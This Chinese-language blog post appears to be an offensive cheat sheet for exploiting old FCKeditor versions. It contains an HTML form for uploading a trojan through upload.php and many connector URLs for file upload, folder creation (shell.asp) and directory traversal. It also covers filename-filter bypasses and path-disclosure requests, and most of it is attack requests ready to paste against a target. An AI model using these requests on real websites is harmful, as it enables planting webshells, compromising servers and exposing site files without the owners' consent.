天天看點
傳回

fckeditor編輯器漏洞

檢視fckeditor編輯器版本 

/_whatsnew.html
           
/editor/dialog/fck_about.html
  • 查出版本資訊之後就可以到網上搜相應的漏洞

version2.2

Apache+linux 環境下在上傳檔案後面加個.突破

version<=2.4.2 For php

  • 該版本在處理PHP上傳的地方沒有對Media類型進行上傳檔案類型的控制,導緻使用者上傳任意檔案。
  • 将以下儲存為html檔案,action别忘了改成自己的,然後就可以上傳木馬,不知道上傳路徑就用bp抓包。 
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.xxxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

test檔案的上傳位址(結合解析漏洞)

FCKeditor/editor/filemanager/browser/default/connectors/test.html(2.4.3)

FCKeditor/editor/filemanager/upload/test.html(2.4.3)

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

如圖,發現有上傳,但是有可能是測試用的,并不能真正上傳木馬,這時候去嘗試其他的連結。

fckeditor編輯器漏洞

其他上傳位址

FCKeditor/_samples/default.html(2.4.3)

FCKeditor/_samples/asp/sample01.asp(2.4.3)

FCKeditor/_samples/asp/sample02.asp(2.4.3)

FCKeditor/_samples/asp/sample03.asp(2.4.3)

FCKeditor/_samples/asp/sample04.asp(2.4.3)

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (2.6.3)

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/connectors/test.html(2.6.6)

FCKeditor/editor/filemanager/connectors/uploadtest.html(2.6.6)

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

可以嘗試利用工具,如圖。

fckeditor編輯器漏洞
fckeditor編輯器漏洞

突破檔案名限制“.”變“_”下劃線

1.送出1.php+空格繞過:空格隻支援windows系統,linux系統是不支援的,可送出1.php+空格來繞過檔案名限制。

2.可以在之前的檔案夾x.asp下再建立一個檔案夾xx.asp,這樣隻檢測了第一級的目錄xx.asp,如果第二級目錄x.asp就不會受限制,把木馬上傳到x.asp中即可。可以通過下面的建立檔案夾突破,也可以通過bp抓包

fckeditor編輯器漏洞
fckeditor編輯器漏洞

%2f在這裡就是/,我們可以把這裡改為/cc.asp

3.二次上傳:繼續上傳同名檔案可變為1.php;(1).jpg,很多時候上傳的檔案例如1.php;.jpg 會變為1_php;.jpg ,上傳兩次1.asp;jpg來突破。

突破建立檔案夾

/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=124478997568

爆路徑漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

FCKeditor被動限制政策所導緻的過濾不嚴問題

影響版本: <= FCKeditor v2.4.3

FCKeditor v2.4.3 中File 類别預設拒絕上傳類型:

html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

  • Fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 字尾的檔案,上傳後它儲存的檔案直接用的

    $sFilePath=$sServerDir.$sFileName

     ,而沒有使用

    $sExtension

     為字尾.直接導緻在win 下在上傳檔案後面加個.來突破。
  • 而在apache 下,因為"Apache 檔案名解析缺陷漏洞"也可以利用之,其他上傳漏洞中定義TYPE 變量時使用File類别來上傳檔案,根據FCKeditor 的代碼,其限制最為狹隘。

jsp版本漏洞

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFold=/

上傳馬所在的目錄:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

上傳shell的位址:

FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector

列目錄漏洞

1.修改CurrentFolder 參數使用 …/…/來進入不同的目錄:

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…/(2.4.1)

2.根據xml傳回資訊檢視網站目錄:

fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=…/…/…/&NewFolderName=shell.asp

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

3.擷取目前檔案夾

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

4.浏覽E盤檔案:

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

5.FCKeditor/editor/fckeditor.html 不可以上傳檔案,可以點選上傳圖檔按鈕再選擇浏覽伺服器即可跳轉至可上傳檔案頁,可以檢視已經上傳的檔案。

6.周遊目錄

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…

browser

fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=…/…/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

上傳漏洞 fckeditor 安全漏洞
上一篇: fckeditor2.4.3 編輯器檔案上傳漏洞
下一篇: php+apache fckeditor漏洞利用

繼續閱讀